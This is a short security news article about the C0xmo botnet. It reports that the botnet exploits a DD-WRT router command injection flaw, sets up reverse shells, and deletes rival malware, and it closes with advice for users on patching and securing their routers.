C0xmo Botnet Hijacks DD‑WRT Routers, Destroys Rival Malware in the Process
- Nishadil
- June 08, 2026
- 0 Comments
- 2 minutes read
- 8 Views
- Save
- Follow Topic
A new wave of infections shows the C0xmo botnet exploiting a DD‑WRT firmware flaw while wiping out competing malware, raising fresh concerns for home‑router security.
Security researchers discovered that the C0xmo botnet is using a known DD‑WRT vulnerability to spread across home routers, simultaneously disabling rival malware strains and complicating remediation efforts.
Earlier this month, security analysts observed an unusual surge of traffic coming from a handful of consumer‑grade routers running the popular DD‑WRT firmware. Digging deeper, they found that the infamous C0xmo botnet had weaponised a long‑standing flaw in the router’s web interface to silently turn these devices into new footholds for its growing network.
The vulnerability – essentially an unauthenticated command injection in the httpd service – has been publicly disclosed for years, yet many users still run outdated DD‑WRT builds. C0xmo’s operators appear to have crafted a lightweight payload that downloads a second‑stage binary, then sets up a reverse shell to a command‑and‑control server. From there, the botnet can push additional modules, update its own code, or use the compromised router as a stepping‑stone to attack other devices on the same LAN.
What makes this campaign stand out, however, is the botnet’s aggressive behaviour toward other malware. In the same traffic logs, researchers noticed the sudden disappearance of a separate IoT‑focused trojan that had been seen on the same hardware just weeks earlier. Lab analysis showed that C0xmo’s installer deliberately checks for the presence of that rival’s files and, if found, overwrites or deletes them – effectively cleaning the router for its own use.
This “malware‑vs‑malware” strategy isn’t entirely new, but it’s rare to see it executed so cleanly on consumer networking gear. By eliminating competition, C0xmo not only secures more resources for itself but also makes detection harder; security tools that were tuned to the older threat now see nothing but normal‑looking traffic from a freshly‑re‑purposed router.
For everyday users, the takeaway is simple but urgent: if you rely on DD‑WRT, make sure you’re running the latest stable release and have disabled remote administration unless absolutely necessary. Changing default passwords, applying firmware updates, and, where possible, switching to a router that receives regular security patches can dramatically cut down the attack surface.
Researchers continue to monitor the botnet’s evolution, warning that its ability to both spread and purge competing code could signal a new era of self‑optimising malware ecosystems. As always, staying informed and keeping devices up‑to‑date remains the best line of defence.
Editorial note: Nishadil may use AI assistance for news drafting and formatting. Readers can report issues from this page, and material corrections are reviewed under our editorial standards.
